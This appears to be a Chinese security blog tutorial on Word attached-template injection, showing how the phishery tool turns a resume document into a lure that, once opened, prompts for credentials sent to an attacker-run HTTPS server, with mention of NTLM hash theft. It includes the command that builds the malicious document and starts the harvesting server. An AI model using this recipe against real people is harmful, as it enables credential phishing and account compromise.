[paragraph]

作者：dk@ht-sec.org

Word模版注入攻击

Word文档附加模版注入攻击是利用Word文档加载附加模版的缺陷发起恶意请求从而达到攻击目的的一种攻击方式，当用户打开这个恶意word文档时可以实施诸如钓鱼、窃取系统 NTLM HASH等攻击。

WORD模版简介Word模板是一种特殊文档，它是提供塑造最终文档外观的基本工具和文本。在Word中，模板是文档的一种模式，用Word编辑的文档都基于一种文档模板。如打开一个空白文档是基于template.dotx模板，让用户可以在其中设置自己的样式、正文和图表等等。（dot模板支持 < Word 2007；dotx模板支持 >= Word 2007）
介绍完，直接开始分享几种简单的利用姿势。

基础认证钓鱼
由于Word文档在钓鱼攻击中应用比较广泛，那这里我们使用Microsoft Word正常写（chui）一份牛逼哄哄的简历，注意，文档保存的格式应该为 docx，命名为 resume.docx。接着使用到Github上的一款工具：phishery[2]。工具的具体原理在后面会简单讲讲。直接使用：

将正常的resume.docx改造成恶意文档：phishery.exe -u https://127.0.0.1/start -i resume.docx -o bad_resume.docx# 这里的 https://127.0.0.1/start 为恶意身份认证服务器的IP，且必须为https协议。

phishery很贴心的支持建立一个恶意身份认证服务，我们这里直接使用phishery建立的服务来演示。直接在终端运行：phishery.exe

执行bad_resume.docx：

环境：Windows 7 + Microsoft Word 2013

环境：Windows 10 + Microsoft Word 2016